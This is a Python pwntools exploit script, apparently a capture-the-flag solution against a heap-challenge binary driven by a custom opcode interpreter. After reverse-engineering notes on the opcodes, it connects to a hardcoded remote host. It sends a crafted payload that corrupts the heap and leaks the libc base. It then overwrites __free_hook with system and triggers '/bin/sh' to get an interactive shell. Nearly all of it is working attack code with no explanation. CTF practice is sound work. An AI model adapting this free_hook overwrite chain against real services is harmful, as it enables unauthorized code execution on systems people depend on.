1 |
|
2 | from pwn import* |
3 |
|
4 | ''' |
5 | func_table: [0x14018 + proc_base] |
6 | opcode_table: [0x13FE8 + proc_base] |
7 | 0x0: 0x4D-> |
8 | calloc(location,1); |
9 | calloc(timeS,1); |
10 | opcode +=3; |
11 | |
12 | 0x1: 0x2A->add;just one times; |
13 | p8(index0) + p8(index1)+p16(Size); opcode+=5 |
14 | 0x2: 0x2F-> |
15 | free(); |
16 | p8(index0) + p8(index1); opcode+=3 |
17 | 0x3: 0x2B-> |
18 | Set the Location; |
19 | p8(index0) + p8(index1) + p8(Location); opcode+=4 |
20 | 1 < Size <= 4; |
21 | 0x4: 0x2D-> |
22 | Set the Location into 0; |
23 | p8(index0) + p8(index1); opcode +=3 |
24 | 0 0 0 0 0 0 0 0 0 0 |
25 | 0 0 0 0 0 0 0 0 0 0 |
26 | 0 0 0 0 0 0 0 0 0 0 |
27 | 0 0 0 0 0 0 0 0 0 0 |
28 | 0 0 0 0 0 0 0 0 0 0 |
29 | 0 0 0 0 0 0 0 0 0 0 |
30 | 0 0 0 0 0 0 0 0 0 0 |
31 | 0 0 0 0 0 0 0 0 0 0 |
32 | 0 0 0 0 0 0 0 0 0 0 |
33 | 0 0 0 0 0 0 0 0 0 0 |
34 |
|
35 | 0x5: 0x77-> |
36 | opcode++; Up ->2、3->2; or 0->1; |
37 | 0x6: 0x73-> |
38 | opcode++; Down ->2、3->2; or 0->1; |
39 | 0x7: 0x61-> |
40 | opcode++; Left ->2、3->2; or 0->1; |
41 | 0x8: 0x64-> |
42 | opcode++; Right->2、3->2; or 0->1; |
43 | 0x9: 0x70-> |
44 | show;opcode++; |
45 | 0xA: 0x00->Exit |
46 | 0xB: 0x01->default;opcode++; |
47 |
|
48 | ''' |
49 |
|
50 | libc = ELF('./libc-2.27.so') |
51 | p = remote('8.140.179.11',13422) |
52 | payload = '\x4D\x10\x10' |
53 | payload += '\x2A\x00\x04\xF0\x04' |
54 | payload += '\x2A\x00\x05\x10\x00' |
55 | payload += '\x2F\x00\x04' |
56 | payload += '\x2A\x00\x04\xF0\x00' |
57 | payload += '\x70' |
58 | payload += '\x73'*0xE |
59 | payload += '\x64\x61'*0x36 |
60 | payload += '\x64'*6 |
61 | payload += '\x2B\x0E\x07\x03' |
62 | payload += '\x64' |
63 | payload += '\x2B\x0F\x08\x03' |
64 | payload += '\x73' |
65 | payload += '\x2A\x00\x06\x70\x00' |
66 | payload += '\x2A\x00\x07\x70\x03' |
67 | payload += '\x2F\x00\x06' |
68 | payload += '\x2F\x00\x04' |
69 | payload += '\x2A\x00\x04\x70\x01' |
70 | payload += '\x2A\x00\x06\x70\x00' |
71 | payload += '\x2A\x00\x08\x70\x00' |
72 | payload += '\x2F\x00\x06' |
73 | payload += '\x00' |
74 | p.sendlineafter('cmd> ',payload) |
75 | sleep(0.1) |
76 | p.sendline('FMYY') |
77 | sleep(0.1) |
78 | p.sendline('FMYY') |
79 | sleep(0.1) |
80 | p.send('\x10') |
81 | p.recvuntil('pos:0,4\n') |
82 | libc_base = (u64(p.recvuntil('\n',drop=True).ljust(8,'\x00')) | 0x4000000000) - 0xF10 - 0x154000 |
83 | log.info('LIBC:\t' + hex(libc_base)) |
84 | log.info('__malloc_Hook:\t' + hex(libc_base + libc.sym['__malloc_hook'])) |
85 | system = libc_base + libc.sym['system'] |
86 | free_hook = libc_base + libc.sym['__free_hook'] |
87 | log.info('__free_hook:\t' + hex(free_hook)) |
88 | p.sendline('FMYY') |
89 | sleep(0.1) |
90 | p.sendline('FMYY') |
91 | sleep(0.1) |
92 | p.sendline('\x00'*0x100 + p64(free_hook)) |
93 | sleep(0.1) |
94 | p.sendline('/bin/sh\x00') |
95 | sleep(0.1) |
96 | p.sendline(p64(system)) |
97 | sleep(0.1) |
98 |
|
99 | p.interactive() |